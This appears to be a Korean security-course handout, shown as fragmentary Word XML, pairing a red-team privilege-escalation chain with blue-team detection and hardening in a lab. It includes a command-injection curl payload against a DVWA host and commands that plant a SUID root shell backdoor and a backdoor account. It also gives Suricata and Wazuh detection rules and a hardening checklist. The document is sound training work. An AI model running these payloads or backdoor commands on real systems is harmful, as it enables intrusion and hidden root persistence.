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[공격고급 W6] 권한 상승 체인 — www-data→root vs 권한상승 탐지·경화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 고급과정 6주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>권한 상승(PrivEsc) 체인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 낮은 권한(웹쉘 www-data)에서 시작해 SUID·sudo 오설정·</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">커널·cron·capabilities·PATH 하이재킹 등을 엮어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>root 까지 올라가는 체인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>을 구성한다. Red 는 체인을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>실행하고, Blue 는 권한상승을 탐지하고 시스템을 경화한다.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웹 침투로 www-data 발판을 잡고(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa06r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), SUID 루트 백도어와 백도어 계정으로 root 지속성을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>확보한다. 방어자는 웹 침투를 탐지하고, SUID/권한상승을 잡고, 경화 체크리스트로 막는다.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권한상승(자기 인프라 표적)과 탐지를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인프라에서 권한상승, Blue 는 자기 인프라에서 탐지·경화.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초기 침투 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`aa06r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, SUID 백도어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa06suid`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka06`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탐지 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9706011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103061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[초기 발판] — 웹 침투로 www-data 셸 확보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권한상승 체인의 시작은 낮은 권한 발판이다. 너는 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa06r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 웹 침투로 www-data 권한의 셸을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>확보한다(이후 RED-2 에서 root 로 상승).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curl -s -A "aa06r1-kim" -H "Host: dvwa.6v6.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/exec/?ip=127.0.0.1;id%23aa06r1-kim&amp;Submit=Submit"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aa06r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 포함된 침투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aa06r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그가 포함된 침투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[권한상승 → root] — SUID 백도어 + root 지속성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www-data 에서 SUID 오설정/sudo 를 악용해 root 로 상승하고, SUID 루트 백도어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa06suid`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 와</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">백도어 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka06`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 으로 지속성을 확보한다(체인: www-data → root).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sudo cp /bin/bash /tmp/.aa06suid &amp;&amp; sudo chmod 4755 /tmp/.aa06suid   # SUID 루트 백도어</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka06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SUID 백도어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa06suid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가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atka06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/tmp/.aa06suid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 존재 또는 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>atka06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[초기 침투 탐지] — Suricata 룰 (sid 9706011)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권한상승의 시작인 웹 침투(명령 인젝션)를 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9706011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(msg:"ATKADV-W06 command injection foothold"; flow:to_server; http.uri; content:";id"; nocase; sid:9706011;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9706011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명령 인젝션을 보는 sid 9706011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[권한상승 탐지] — SUID/계정 Wazuh 룰 (id 103061)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 의 SUID 백도어·root 지속성을 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103061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name="edu,privesc,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103061" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;4755&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W06 - SUID privilege escalation / backdoor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r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">또한 SUID 헌팅: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null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103061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SUID 권한상승을 보는 id 103061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[경화 체크리스트] — 권한상승 방어 + 헌팅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권한상승을 구조적으로 막는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>시스템 경화 체크리스트</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 작성한다(SUID 최소화, sudo 제한, 커널 패치, cron</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>권한, world-writable 제거, PATH 정리).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경화 체크리스트(SUID/sudo/커널/cron/world-writable/capabilities/PATH)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SUID 백도어(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa06suid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(atka06) 헌팅 결과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경화 체크리스트/헌팅으로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경화 체크리스트·헌팅은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